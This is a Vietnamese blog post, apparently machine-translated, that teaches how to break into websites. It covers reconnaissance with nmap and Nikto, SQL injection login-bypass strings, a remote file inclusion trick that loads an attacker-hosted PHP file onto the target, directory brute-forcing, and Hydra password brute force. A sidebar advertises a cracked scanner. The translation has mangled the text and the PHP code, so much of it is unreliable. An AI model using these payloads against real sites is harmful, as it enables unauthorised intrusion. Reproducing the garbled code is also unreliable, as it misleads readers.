Hack thành công một Website trong năm 2017!
Xin chào các bạn, trước hết tôi muốn cảm ơn tất cả những người đã gửi cho tôi thông tin phản hồi tích cực về bài viết của tôi, nói rằng tôi luôn luôn sẵn sàng học hỏi và giảng dạy.
Vậy làm thế nào để Hack một Website?
Đầu tiên hãy tự hỏi tại sao bạn muốn hack một Website???
Ngay
cả trong trường hợp bạn không bao giờ có một hack thành công trước khi
tôi giả định rằng một khi bạn ở đây bạn đã biết ý nghĩa của các pic trên
là những gì (hình ảnh trông hơi đáng sợ và nhiều hơn như một thái độ mũ
đen), việc phân loại các hacker thực sự làm không làm cho rất nhiều ý
nghĩa, theo ý kiến của tôi có người mới, tin tặc, tin tặc chuyên gia
và thậm chí tồi tệ hơn khu Đông thành phố xung quanh, thậm chí như một
mũ trắng (theo những gì thế giới định nghĩa như là mũ trắng), đôi khi
bạn sẽ tìm thấy chính mình trong những tình huống nơi bạn có để mang lại
một lỗ một * xuống vì họ đang chạy không - các trang web con người như
khiêu dâm trẻ em và vv
ĐƯỢC! Vì vậy, Làm thế nào để Hack một Website?
Có một loạt các hướng dẫn ở internet về cách hack một trang web với một công cụ cụ thể, trong trường hợp bạn muốn tìm hiểu bạn đang ở đúng nơi, chỉ cần nhìn xung quanh, nhưng hôm nay tôi muốn chia sẻ một cái gì đó mà tôi nghĩ rằng nó sẽ rất hữu ích cho bạn, phải mất một tách cà phê lấy ghế của bạn và bắt đầu đọc này, những gì im đi để cho bạn ngày hôm nay là hoàn toàn khác nhau từ các hướng dẫn khác của tôi, thay vì hiển thị cho bạn làm thế nào để sử dụng những công cụ này , tôi sẽ hướng dẫn bạn làm thế nào bạn có thể sử dụng thành công những công cụ và thủ thuật để hack bất kỳ trang web, dựa trên kinh nghiệm của tôi.Dưới đây là danh sách của tôi khi tôi muốn hack một trang web
Trinh sát : Khảo sát và tìm ra điểm yếu của victim
Lời khuyên của tôi :
các dịch vụ mà họ đang chạy là gì?Tìm ra các chất liệu như cổng mở, phần mềm và các phiên bản trên máy chủ, và cố gắng tìm kiếm sự khai thác trong trường hợp có ít nhất một trực tuyến, hoặc bạn chỉ có thể làm cho khai thác của riêng bạn.
Các công cụ mà tôi khuyên bạn nên cho phần này là nmap, whatweb và Nikto và tất nhiên một số người khác được thực hiện bởi Mr_ Nakup3nda hoặc bạn.
Họ viết kịch bản của mình?
Trong trường hợp họ đã viết nó bằng chính mình, tìm kiếm kịch bản mà có đầu vào người sử dụng, quét danh sách thư mục, kiểm tra mã nguồn, tìm hiểu làm thế nào các trang web phản ứng với đầu vào bất thường, tôi thường sử dụng các yếu tố đầu vào:
ADMIN 'OR 1 = 1 # khi một url quản trị của nó như trang web / admin / loign /
khi đăng nhập bình thường của nó chỉ là thử những kim phun sql truyền thống như
'OR' 1 '=' 1 '-
'OR' 1 '=' 1 '({
'OR' 1 '=' 1 '/ *
, Nhưng nó không kết thúc ở đây, cố gắng để viết các câu lệnh sql trên đầu vào, làm echo lại cho bạn, hãy cố gắng thực thi một lệnh dựa trên hệ điều hành máy chủ, tìm ra cách các trang web lọc đầu vào và cố gắng để vượt qua các bộ lọc.
Và trong trường hợp họ sử dụng mã của người khác như CMS chỉ cần lấy một bản sao của nó và cố gắng để tìm thấy lỗi trên của riêng bạn, hoặc tìm một khai thác nếu họ sử dụng một phiên bản có thể khai thác của CMS.
The Evil Google : Google-công cụ hỗ trợ hacking tốt nhất
Đôi khi tôi Hack trang web đơn giản với sự giúp đỡ của một số tìm kiếm google crafted, như tin tặc, bạn phải biết làm thế nào để sử dụng Google để thu thập thông tin hoặc hack, trong trường hợp bạn không biết bạn có thể xem hướng dẫn của tôi về làm thế nào để sử dụng Google để hack
Thay đổi Mã Nguồn
Tôi đặt cược vào thời điểm này bạn đã biết làm thế nào để xem mã nguồn của trang web bằng cách sử dụng nhấp chuột lừa đúng, chỉ cần nhớ rằng ngôn ngữ kịch bản như php, perl, asp, trăn vv chạy trên máy chủ - mặt, vì vậy nó có nghĩa là bạn không thể nhìn thấy bằng cách click chuột phải trừ khi một nền tảng mã nguồn mở của nó, nơi bạn có thể nhận được một bản sao của nó và thay đổi toàn bộ mã.Tập tin Inclusion từ xa
Tập tin bao gồm tổn thương là một loại tổn thương thường xuyên nhất được tìm thấy trên các trang web. Nó cho phép kẻ tấn công bao gồm một tập tin, thường là thông qua một kịch bản trên máy chủ web. Lỗ hổng này xảy ra do việc sử dụng các đầu vào người dùng cung cấp mà không cần xác nhận đúng. Dưới đây chúng tôi có một đoạn mã php mở một tập tin.<? Php
if (! ($ hfile = fopen ( "$ file", "r"))
echo ( "lỗi không thể mở các tập tin: $ file <br /> \ n");
?>
Ví dụ này mở tập tin với tên được chỉ định trong sử dụng đầu vào ($ file).
Điều đó có nghĩa là nó sẽ mở ra mỗi tập tin một kẻ tấn công muốn mở và nếu cho phép url fopen là ON thậm chí các file từ xa.
Hãy tìm ví dụ ở đoạn mã này:
Thí dụ:
<? Php
bao gồm ($ dir "/members.php".);
?>
Chỉ cần tạo ra một tập tin .members.php trên máy chủ web của bạn và gọi các kịch bản như thế này:
dir = http://www.server.com/
Nó sẽ thực hiện tập tin của bạn trên máy chủ mục tiêu. Quan trọng là chỉ là bạn có PHP tắt hoặc mã sẽ được thực hiện trên máy chủ của bạn.
directory Listing
duyệt Index có thể rất hữu ích khi cố gắng tìm các tập tin mà bạn thường không nên xem như các tập tin mật khẩu, file được sử dụng để quản trị trang web, đăng nhập các tập tin, các tập tin trong đó thông tin được lưu trữ.bạn cũng có thể tự kiểm tra cho các url đáng ngờ như thế:
website.com/logs/
website.com/files/
website.com/sql/
website.com/secret/
bạn có thể làm cho các công cụ tự động sẽ làm điều đó cho bạn, công cụ như dirbsuter có thể rất hữu ích cho công việc này.
SQL-Injection
SQL injection là một kỹ thuật tiêm mã, được sử dụng để tấn công các ứng
dụng hướng dữ liệu, trong đó các câu lệnh SQL độc hại được đưa vào một
lĩnh vực nhập cảnh để thực hiện, trong kinh nghiệm của cá nhân tôi, đây
là vấn đề phổ biến nhất mà bạn sẽ tìm thấy trên các trang web, vấn đề là
một số trang web đưa những thông tin trong một cơ sở dữ liệu và không
phải tất cả lọc chúng.
brute Buộc
Đôi khi bạn sẽ thử tất cả các phương pháp nêu trên, nhưng một số trang web có thực sự an toàn và không có cách nào dễ dàng để khai thác chúng.Thường thì điều này không ngăn cản chúng tôi từ hacking họ, họ có thể có mở cổng chạy một số dịch vụ như, ftp, telnet và như vậy, cố gắng sức mạnh vũ phu nó và có được mật khẩu, Hydra là một công cụ tuyệt vời cho các loại hình công việc.
Loại khác tấn công Bạn cũng có thể Thực hiện Are:
Tràn bộ nhớHeap Overflow
Integer overflow
Và danh sách còn dài, tôi chỉ chia sẻ những gì tôi đã nhận bây giờ trong tâm trí của tôi, bạn cũng có thể thêm bạn trong các phần bình luận ... thấy bạn rất sớm trong bài hướng dẫn tiếp theo.
Chức năng PHP khai thác
Mã Thực hiện:yêu cầu () - đọc một tập tin và diễn giải nội dung như mã PHP
bao gồm () - đọc một tập tin và diễn giải nội dung như mã PHP
eval () - giải thích chuỗi như mã PHP
preg thay thế () - nếu nó sử dụng các sửa đổi lần / e nó diễn giải các chuỗi thay thế như mã PHP
Lệnh thực hiện:
exec () - thực hiện lệnh + trả về dòng cuối cùng của sản lượng của nó
passthru () - thực hiện lệnh + trả về đầu ra của nó đến trình duyệt từ xa
(Backticks) - thực hiện lệnh và trả về đầu ra trong một mảng
shellexec - thực hiện lệnh + trả về đầu ra như chuỗi
hệ thống () - thực hiện lệnh + trả về đầu ra của nó (nhiều giống như passthru ())
.can't xử lý dữ liệu nhị phân
popen () - thực hiện lệnh + kết nối đầu ra hoặc đầu vào dòng của mình cho một mô tả tập tin PHP
Tập Tiết lộ:
fopen () - mở một tập tin và liên kết nó với một mô tả tập tin PHP
readfile () - đọc một tập tin và viết nội dung của nó trực tiếp vào trình duyệt từ xa
file () - đọc toàn bộ tập tin vào một mảng
tập tin có nội dung () - đọc tập tin vào một chuỗi
Hack thành công một Website trong năm 2017!
Reviewed by Nặc danh
on
10:49 SA
Rating:
Reviewed by Nặc danh
on
10:49 SA
Rating:
![[web scan vulteer] Netsparker Professional Edition 4.8.0.13139 Cracked](https://4.bp.blogspot.com/-xDOC1jEaVfM/WfbBYeCMqWI/AAAAAAAAB6g/R-6lN7IRdQgEXn3N3tftkYbzBjFfrgiygCLcBGAs/s72-c/Netsparker-Web-Application-Security-Scanner%25281%2529.png)
![[Share] 10 best-selling course Udemy | 10 khóa học bán chạy nhất của Udemy](https://4.bp.blogspot.com/-jmcsDkP9p5s/WfbCcOkTcOI/AAAAAAAAB68/PBOrxyE36oMkApmvK9CgdI2nqDC7glMjACLcBGAs/s72-c/Capture111%25281%2529%25281%2529%25281%2529.png)
Không có nhận xét nào: